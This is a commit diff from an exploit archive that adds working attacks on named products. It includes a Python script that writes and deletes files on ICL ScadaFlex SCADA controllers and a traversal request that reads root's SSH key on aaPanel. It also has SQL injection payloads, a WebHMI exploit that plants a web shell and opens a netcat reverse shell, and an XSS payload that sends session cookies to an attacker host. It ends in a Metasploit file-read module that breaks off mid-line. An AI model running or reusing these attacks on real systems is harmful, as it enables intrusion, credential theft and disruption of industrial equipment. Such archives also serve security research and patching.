DB: 2022-02-24
9 changes to exploits/shellcodes Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE) ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD Simple Real Estate Portal System 1.0 - 'id' SQLi Air Cargo Management System v1.0 - SQLi aaPanel 6.8.21 - Directory Traversal (Authenticated) Student Record System 1.0 - 'cid' SQLi (Authenticated) WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated) WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated) Microweber CMS 1.2.10 - Local File Inclusion (Authenticated) (Metasploit)
This commit is contained in:
parent
7ebb89ceab
commit
7755ac3af6
10 changed files with 744 additions and 0 deletions
175
exploits/hardware/remote/50783.py
Executable file
175
exploits/hardware/remote/50783.py
Executable file
|
@ -0,0 +1,175 @@
|
||||||
|
# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
|
||||||
|
# Exploit Author: LiquidWorm
|
||||||
|
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vendor: Industrial Control Links, Inc.
|
||||||
|
# Product web page: http://www.iclinks.com
|
||||||
|
# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf
|
||||||
|
# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24
|
||||||
|
# SW: 1.02.20 (build 286), WebLib: 1.24
|
||||||
|
# SW: 1.02.15 (build 286), WebLib: 1.22
|
||||||
|
# SW: 1.02.01 (build 229), WebLib: 1.16
|
||||||
|
# SW: 1.01.14 (build 172), WebLib: 1.14
|
||||||
|
# SW: 1.01.01 (build 2149), WebLib: 1.13
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Summary: Scadaflex II controllers are 100% web based
|
||||||
|
# for both configuration and user interface. No applications
|
||||||
|
# are required other than any standard web browser. They
|
||||||
|
# are easily supported by remote access over the Internet
|
||||||
|
# or a cellular link. Scadaflex II controllers support
|
||||||
|
# industry standard wired communications using Modbus,
|
||||||
|
# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial
|
||||||
|
# bridging for Modbus or any other protocol. Each Scadaflex
|
||||||
|
# II controller has both analog and digital, inputs and
|
||||||
|
# outputs, sufficient for pumping stations, irrigation
|
||||||
|
# controls, and other similar process monitoring and control
|
||||||
|
# applications. They can also serve as communications
|
||||||
|
# concentrators and protocol converters that enhance the
|
||||||
|
# operation of existing PLCs and process equipment.
|
||||||
|
#
|
||||||
|
# Desc: The SCADA controller is vulnerable to unauthenticated
|
||||||
|
# file write/overwrite and delete vulnerability. This allows
|
||||||
|
# an attacker to execute critical file CRUD operations on the
|
||||||
|
# device that can potentially allow system access and impact
|
||||||
|
# availability.
|
||||||
|
#
|
||||||
|
# Tested on: SCADA HTTP Server
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
# @zeroscience
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Advisory ID: ZSL-2022-5698
|
||||||
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php
|
||||||
|
#
|
||||||
|
# CVE ID: CVE-2022-25359
|
||||||
|
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# 06.11.2021
|
||||||
|
#
|
||||||
|
|
||||||
|
import time,sys
|
||||||
|
import requests
|
||||||
|
import datetime
|
||||||
|
import showtime
|
||||||
|
|
||||||
|
# Default
|
||||||
|
# AES Encryption Key = 'ABCD1234abcd:ICL'
|
||||||
|
|
||||||
|
def bann():
|
||||||
|
print('''
|
||||||
|
----------------------------------------------------------
|
||||||
|
) ) ) ) ) )
|
||||||
|
( ( ( ( ( (
|
||||||
|
) ) ) ) ) )
|
||||||
|
(~~~~~~~~~) (~~~~~~~~~)
|
||||||
|
| t00t | | w00t |
|
||||||
|
| | | |
|
||||||
|
I _._ I _._
|
||||||
|
I /' `\\ I /' `\\
|
||||||
|
I | M | I | J |
|
||||||
|
f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|
|
||||||
|
.' | ||~~~~~~~~| | .' | | |~~~~~~~~| |
|
||||||
|
/'______|___||__###___|____|/'_______|____|_|__###___|___|
|
||||||
|
|
||||||
|
ScadaFlex II SCADA Controllers
|
||||||
|
Remote write/delete PoC
|
||||||
|
ZSL-2022-5698
|
||||||
|
----------------------------------------------------------
|
||||||
|
''')
|
||||||
|
|
||||||
|
def safe(*trigger, ):
|
||||||
|
return True # |-| Safety Switch
|
||||||
|
|
||||||
|
def choice(n):
|
||||||
|
try:
|
||||||
|
if n == 1:
|
||||||
|
overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))
|
||||||
|
elif n == 2:
|
||||||
|
delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))
|
||||||
|
else:
|
||||||
|
print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')
|
||||||
|
print('Usage (Delete): ./sflex.py [IP] [File position number]')
|
||||||
|
raise SystemExit('t00t')
|
||||||
|
except Exception as tip:
|
||||||
|
raise SystemExit(tip)
|
||||||
|
|
||||||
|
def jump():
|
||||||
|
choice(1) if len(sys.argv) == 4 else next
|
||||||
|
choice(2) if len(sys.argv) == 3 else next
|
||||||
|
|
||||||
|
def overwrite(controllerip, filepos):
|
||||||
|
print('Starting script at', start)
|
||||||
|
localfile = sys.argv[2]
|
||||||
|
|
||||||
|
with open(localfile, 'rb') as opener:
|
||||||
|
scadaurl = 'http://'
|
||||||
|
scadaurl += controllerip
|
||||||
|
scadaurl += '/d.php?N'
|
||||||
|
scadaurl += str(filepos)
|
||||||
|
scadaurl += ',73,'
|
||||||
|
scadaurl += opener.name
|
||||||
|
scadaurl += '~'
|
||||||
|
scadaurl += str(int(time.time()))
|
||||||
|
|
||||||
|
see = requests.post(scadaurl, files = {'upload' : opener})
|
||||||
|
|
||||||
|
if '100' in see.text:
|
||||||
|
print('File uploaded in {} directory at position {}.'.format('l', filepos))
|
||||||
|
print('URL: http://' +controllerip+ '/l/' +localfile)
|
||||||
|
else:
|
||||||
|
print("- controller webserver error.")
|
||||||
|
exit()
|
||||||
|
|
||||||
|
def delete(controllerip, filepos):
|
||||||
|
print('Starting script at', start)
|
||||||
|
exit(42) if isinstance(filepos, str) else next
|
||||||
|
|
||||||
|
scadaurl = 'http://'
|
||||||
|
scadaurl += controllerip
|
||||||
|
scadaurl += '/rW12IcL_Dat_N'
|
||||||
|
scadaurl += str(filepos)
|
||||||
|
scadaurl += ',0=1~'
|
||||||
|
scadaurl += str(int(time.time()))
|
||||||
|
|
||||||
|
see = requests.get(scadaurl)
|
||||||
|
|
||||||
|
check = '\x72\x57' #|
|
||||||
|
check += '\x31\x32' #|
|
||||||
|
check += '\x49\x63' #|
|
||||||
|
check += '\x4c\x5f' #|
|
||||||
|
check += '\x44\x61' #|
|
||||||
|
check += '\x74\x5f' #|
|
||||||
|
check += '\x4e'# o' #|
|
||||||
|
check += str(filepos)#|
|
||||||
|
check += '\x2c\x30' #|
|
||||||
|
check += '\x09\x52' #|
|
||||||
|
|
||||||
|
if check in see.text:
|
||||||
|
print('File at position {} deleted.'.format(filepos))
|
||||||
|
else:
|
||||||
|
print('- controller webserver error.')
|
||||||
|
exit()
|
||||||
|
|
||||||
|
def main():
|
||||||
|
if safe(True):
|
||||||
|
print('Careful...\nSafety: ON')
|
||||||
|
exit(17)
|
||||||
|
else:
|
||||||
|
print('Safety: OFF', end = '')
|
||||||
|
global start
|
||||||
|
start = datetime.datetime.now()
|
||||||
|
start = start.strftime('%d.%m.%Y %H:%M:%S')
|
||||||
|
bann(), jump(), choice(1959)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
main()
|
40
exploits/linux/webapps/50780.txt
Normal file
40
exploits/linux/webapps/50780.txt
Normal file
|
@ -0,0 +1,40 @@
|
||||||
|
# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
|
||||||
|
# Date: 22.02.2022
|
||||||
|
# Exploit Author: Fikrat Ghuliev (Ghuliev)
|
||||||
|
# Vendor Homepage: https://www.aapanel.com/
|
||||||
|
# Software Link: https://www.aapanel.com
|
||||||
|
# Version: 6.8.21
|
||||||
|
# Tested on: Ubuntu
|
||||||
|
|
||||||
|
Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
|
||||||
|
|
||||||
|
#Go to App Store
|
||||||
|
|
||||||
|
#Click to "install" in any free plugin.
|
||||||
|
|
||||||
|
#Change installation script to ../../../root/.ssh/id_rsa
|
||||||
|
|
||||||
|
POST /ajax?action=get_lines HTTP/1.1
|
||||||
|
Host: IP:7800
|
||||||
|
Content-Length: 41
|
||||||
|
Accept: */*
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
|
||||||
|
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
|
||||||
|
Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
Origin: http://IP:7800
|
||||||
|
Referer: http://IP:7800/soft
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: en-US,en;q=0.9
|
||||||
|
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
|
||||||
|
request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
|
||||||
|
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
|
||||||
|
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
|
||||||
|
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
|
||||||
|
load_type=null; load_search=undefined; force=0; rank=list;
|
||||||
|
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
|
||||||
|
path_dir_change=/www/wwwroot/
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
num=10&filename=../../../root/.ssh/id_rsa
|
28
exploits/php/webapps/50778.txt
Normal file
28
exploits/php/webapps/50778.txt
Normal file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection
|
||||||
|
# Date: 22/02/2022
|
||||||
|
# Exploit Author: Mosaaed
|
||||||
|
# Vendor Homepage: https://www.sourcecodester.com/
|
||||||
|
# Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Sqlmap command:
|
||||||
|
|
||||||
|
sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs
|
||||||
|
|
||||||
|
# Output:
|
||||||
|
|
||||||
|
Parameter: id (GET)
|
||||||
|
Type: boolean-based blind
|
||||||
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC
|
||||||
|
|
||||||
|
Type: UNION query
|
||||||
|
Title: Generic UNION query (NULL) - 9 columns
|
||||||
|
Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
|
33
exploits/php/webapps/50779.txt
Normal file
33
exploits/php/webapps/50779.txt
Normal file
|
@ -0,0 +1,33 @@
|
||||||
|
# Title: Air Cargo Management System v1.0 - SQLi
|
||||||
|
# Author: nu11secur1ty
|
||||||
|
# Date: 02.18.2022
|
||||||
|
# Vendor: https://www.sourcecodester.com/users/tips23
|
||||||
|
# Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
|
||||||
|
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System
|
||||||
|
|
||||||
|
# Description:
|
||||||
|
The `ref_code` parameter from Air Cargo Management System v1.0 appears
|
||||||
|
to be vulnerable to SQL injection attacks.
|
||||||
|
The payload '+(select
|
||||||
|
load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'
|
||||||
|
was submitted in the ref_code parameter.
|
||||||
|
This payload injects a SQL sub-query that calls MySQL's load_file
|
||||||
|
function with a UNC file path that references a URL on an external
|
||||||
|
domain.
|
||||||
|
The application interacted with that domain, indicating that the
|
||||||
|
injected SQL query was executed.
|
||||||
|
WARNING: If this is in some external domain, or some subdomain
|
||||||
|
redirection, or internal whatever, this will be extremely dangerous!
|
||||||
|
Status: CRITICAL
|
||||||
|
|
||||||
|
|
||||||
|
[+] Payloads:
|
||||||
|
|
||||||
|
---
|
||||||
|
Parameter: ref_code (GET)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: p=trace&ref_code=258044'+(select
|
||||||
|
load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''
|
||||||
|
AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki
|
||||||
|
---
|
36
exploits/php/webapps/50782.txt
Normal file
36
exploits/php/webapps/50782.txt
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated)
|
||||||
|
# Exploit Author: Mohd. Anees
|
||||||
|
# Contact: https://www.linkedin.com/in/aneessecure/
|
||||||
|
# Software Homepage: https://phpgurukul.com/student-record-system-php/
|
||||||
|
# Version : 1.0
|
||||||
|
# Tested on: windows 10 xammp | Kali linux
|
||||||
|
# Category: WebApp
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 22.02.2022
|
||||||
|
######## Description ########
|
||||||
|
#
|
||||||
|
#
|
||||||
|
# Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work
|
||||||
|
#
|
||||||
|
# http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+
|
||||||
|
#
|
||||||
|
######## Proof of Concept ########
|
||||||
|
|
||||||
|
========>>> REQUEST <<<=========
|
||||||
|
|
||||||
|
GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
|
||||||
|
sec-ch-ua-mobile: ?0
|
||||||
|
sec-ch-ua-platform: "Windows"
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||||
|
Sec-Fetch-Site: none
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
|
||||||
|
Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt
|
||||||
|
Connection: close
|
106
exploits/php/webapps/50784.py
Executable file
106
exploits/php/webapps/50784.py
Executable file
|
@ -0,0 +1,106 @@
|
||||||
|
# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
|
||||||
|
# Date: 03/01/2022
|
||||||
|
# Exploit Author: Antonio Cuomo (arkantolo)
|
||||||
|
# Vendor Homepage: https://webhmi.com.ua/en/
|
||||||
|
# Version: WebHMI 4.1.1.7662
|
||||||
|
# Tested on: WebHMI-4.1.1.7662
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
import argparse
|
||||||
|
import requests
|
||||||
|
import time
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
|
||||||
|
print("Level2 account must be enabled !\n");
|
||||||
|
|
||||||
|
login = "admin"
|
||||||
|
password = "admin"
|
||||||
|
|
||||||
|
class Exploit:
|
||||||
|
|
||||||
|
def __init__(self, target_ip, target_port, localhost, localport):
|
||||||
|
self.target_ip = target_ip
|
||||||
|
self.target_port = target_port
|
||||||
|
self.localhost = localhost
|
||||||
|
self.localport = localport
|
||||||
|
|
||||||
|
def exploitation(self):
|
||||||
|
reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
|
||||||
|
payload = "<?php+system($_GET['c']);+?>"
|
||||||
|
|
||||||
|
headers_login = {
|
||||||
|
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
|
||||||
|
'Accept': 'application/json, text/javascript, */*; q=0.01',
|
||||||
|
'Accept-Language': 'en-US,en;q=0.5',
|
||||||
|
'Accept-Encoding': 'gzip, deflate',
|
||||||
|
'Content-Type': 'application/json',
|
||||||
|
'X-WH-LOGIN': login,
|
||||||
|
'X-WH-PASSWORD': password,
|
||||||
|
'X-Requested-With': 'XMLHttpRequest',
|
||||||
|
'Connection': 'close',
|
||||||
|
'Content-Length': '0'
|
||||||
|
}
|
||||||
|
|
||||||
|
url = 'http://' + target_ip + ':' + target_port
|
||||||
|
r = requests.Session()
|
||||||
|
|
||||||
|
print('[*] Resolving URL...')
|
||||||
|
r1 = r.get(url)
|
||||||
|
time.sleep(3)
|
||||||
|
|
||||||
|
print('[*] Trying to log in...')
|
||||||
|
r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
|
||||||
|
time.sleep(3)
|
||||||
|
|
||||||
|
print('[*] Login redirection...')
|
||||||
|
login_cookies = {
|
||||||
|
'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
|
||||||
|
'X-WH-CHECK-TRIAL':'true',
|
||||||
|
'il18next':'en',
|
||||||
|
}
|
||||||
|
r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
|
||||||
|
time.sleep(3)
|
||||||
|
|
||||||
|
print('[*] Bypassing basedir...')
|
||||||
|
for i in range(0, len(payload)):
|
||||||
|
#print(payload[i])
|
||||||
|
rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies)
|
||||||
|
time.sleep(0.2)
|
||||||
|
|
||||||
|
print('[*] Setting up listener...')
|
||||||
|
listener = subprocess.Popen(["nc", "-nlp", self.localport])
|
||||||
|
time.sleep(2)
|
||||||
|
|
||||||
|
print('[*] Executing payload...')
|
||||||
|
time.sleep(1)
|
||||||
|
print('[*] Waiting reverse shell...')
|
||||||
|
r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies)
|
||||||
|
|
||||||
|
if (r4.status_code == 200):
|
||||||
|
print('[*] Got shell!')
|
||||||
|
while True:
|
||||||
|
listener.wait()
|
||||||
|
else:
|
||||||
|
print('[-] Something went wrong!')
|
||||||
|
listener.terminate()
|
||||||
|
|
||||||
|
def get_args():
|
||||||
|
parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)')
|
||||||
|
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
|
||||||
|
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
|
||||||
|
parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
|
||||||
|
parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
|
||||||
|
args = parser.parse_args()
|
||||||
|
return args
|
||||||
|
|
||||||
|
args = get_args()
|
||||||
|
target_ip = args.url
|
||||||
|
target_port = args.target_port
|
||||||
|
localhost = args.localhost
|
||||||
|
localport = args.localport
|
||||||
|
|
||||||
|
exp = Exploit(target_ip, target_port, localhost, localport)
|
||||||
|
exp.exploitation()
|
30
exploits/php/webapps/50785.txt
Normal file
30
exploits/php/webapps/50785.txt
Normal file
|
@ -0,0 +1,30 @@
|
||||||
|
# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
|
||||||
|
# Date: 04/01/2022
|
||||||
|
# Exploit Author: Antonio Cuomo (arkantolo)
|
||||||
|
# Vendor Homepage: https://webhmi.com.ua/en/
|
||||||
|
# Version: WebHMI Firmware 4.1.1.7662
|
||||||
|
# Tested on: WebHMI Firmware 4.1.1.7662
|
||||||
|
|
||||||
|
#Steps to Reproduce
|
||||||
|
|
||||||
|
1. Login to admin account
|
||||||
|
|
||||||
|
2. Add a new register or create new dashboard
|
||||||
|
insert payload
|
||||||
|
|
||||||
|
<script>var i=new Image;i.src="http://ATTACKERIP/?"+document.cookie;</script>
|
||||||
|
|
||||||
|
in Title field and save.
|
||||||
|
|
||||||
|
# Dashboard section impact instantly all logged users.
|
||||||
|
|
||||||
|
#Listener log:
|
||||||
|
GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1
|
||||||
|
Host: 192.168.0.169:8080
|
||||||
|
Connection: keep-alive
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
|
||||||
|
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
|
||||||
|
Sec-GPC: 1
|
||||||
|
Referer: http://192.168.0.153/
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
|
245
exploits/php/webapps/50786.rb
Executable file
245
exploits/php/webapps/50786.rb
Executable file
|
@ -0,0 +1,245 @@
|
||||||
|
# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated)
|
||||||
|
# Date: 22.02.2022
|
||||||
|
# Exploit Author: Talha Karakumru <talhakarakumru[at]gmail.com>
|
||||||
|
# Vendor Homepage: https://microweber.org/
|
||||||
|
# Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip
|
||||||
|
# Version: Microweber CMS v1.2.10
|
||||||
|
# Tested on: Microweber CMS v1.2.10
|
||||||
|
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Auxiliary
|
||||||
|
prepend Msf::Exploit::Remote::AutoCheck
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(
|
||||||
|
update_info(
|
||||||
|
info,
|
||||||
|
'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)',
|
||||||
|
'Description' => %q{
|
||||||
|
Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
|
||||||
|
Upload function may delete the local file if the web service user has access.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [
|
||||||
|
'Talha Karakumru <talhakarakumru[at]gmail.com>'
|
||||||
|
],
|
||||||
|
'References' => [
|
||||||
|
['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
|
||||||
|
],
|
||||||
|
'Notes' => {
|
||||||
|
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
|
||||||
|
'Reliability' => [ REPEATABLE_SESSION ],
|
||||||
|
'Stability' => [ OS_RESOURCE_LOSS ]
|
||||||
|
},
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Microweber v1.2.10', {} ]
|
||||||
|
],
|
||||||
|
'Privileged' => true,
|
||||||
|
'DisclosureDate' => '2022-01-30'
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
|
||||||
|
OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
|
||||||
|
OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
|
||||||
|
OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
|
||||||
|
OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true])
|
||||||
|
]
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'GET',
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'admin', 'login')
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.')
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status 'Checking if it\'s Microweber CMS.'
|
||||||
|
|
||||||
|
if res.code == 200 && !res.body.include?('Microweber')
|
||||||
|
print_error 'Microweber CMS has not been detected.'
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.code != 200
|
||||||
|
fail_with(Failure::Unknown, res.body)
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good 'Microweber CMS has been detected.'
|
||||||
|
|
||||||
|
return check_version(res.body)
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_version(res_body)
|
||||||
|
print_status 'Checking Microweber\'s version.'
|
||||||
|
|
||||||
|
begin
|
||||||
|
major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.')
|
||||||
|
version = Rex::Version.new("#{major}.#{minor}.#{build}")
|
||||||
|
rescue NoMethodError, TypeError
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
if version == Rex::Version.new('1.2.10')
|
||||||
|
print_good 'Microweber version ' + version.to_s
|
||||||
|
return Exploit::CheckCode::Appears
|
||||||
|
end
|
||||||
|
|
||||||
|
print_error 'Microweber version ' + version.to_s
|
||||||
|
|
||||||
|
if version < Rex::Version.new('1.2.10')
|
||||||
|
print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.'
|
||||||
|
return Exploit::CheckCode::Unknown
|
||||||
|
end
|
||||||
|
|
||||||
|
return Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def try_login
|
||||||
|
print_status 'Trying to log in.'
|
||||||
|
res = send_request_cgi({
|
||||||
|
'method' => 'POST',
|
||||||
|
'keep_cookies' => true,
|
||||||
|
'uri' => normalize_uri(target_uri.path, 'api', 'user_login'),
|
||||||
|
'vars_post' => {
|
||||||
|
'username' => datastore['USERNAME'],
|
||||||
|
'password' => datastore['PASSWORD'],
|
||||||
|
'lang' => '',
|
||||||
|
'where_to' => 'admin_content'
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
if res.nil?
|
||||||
|
fail_with(Failure::Unreachable, 'Log in request failed.')
|
||||||
|
end
|
||||||
|
|
||||||
|
if res.code != 200
|
||||||
|
fail_with(Failure::Unknown, res.body)
|
||||||
|
end
|
||||||
|
|
||||||
|
json_res = res.get_json_document
|
||||||
|
|
||||||
|
if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.'
|
||||||
|
fail_with(Failure::BadConfig, 'Wrong username or password.')
|
||||||
|
end
|
||||||
|
|
||||||
|
if !json_res['success'].nil? && json_res['success'] == 'You are logged in'
|
||||||
|
print_good 'You are logged in.'
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
fail_with(Failure::Unknown, 'An unknown error occurred.')
|
||||||
|
end
|
||||||
|
|
||||||
|
def try_upload
|
||||||
|
print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
|
||||||
|
|
||||||
|
referer = ''
|
||||||
|
if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
|
||||||
|
referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
|
||||||
|
else
|
||||||
|
referer = full_uri
|
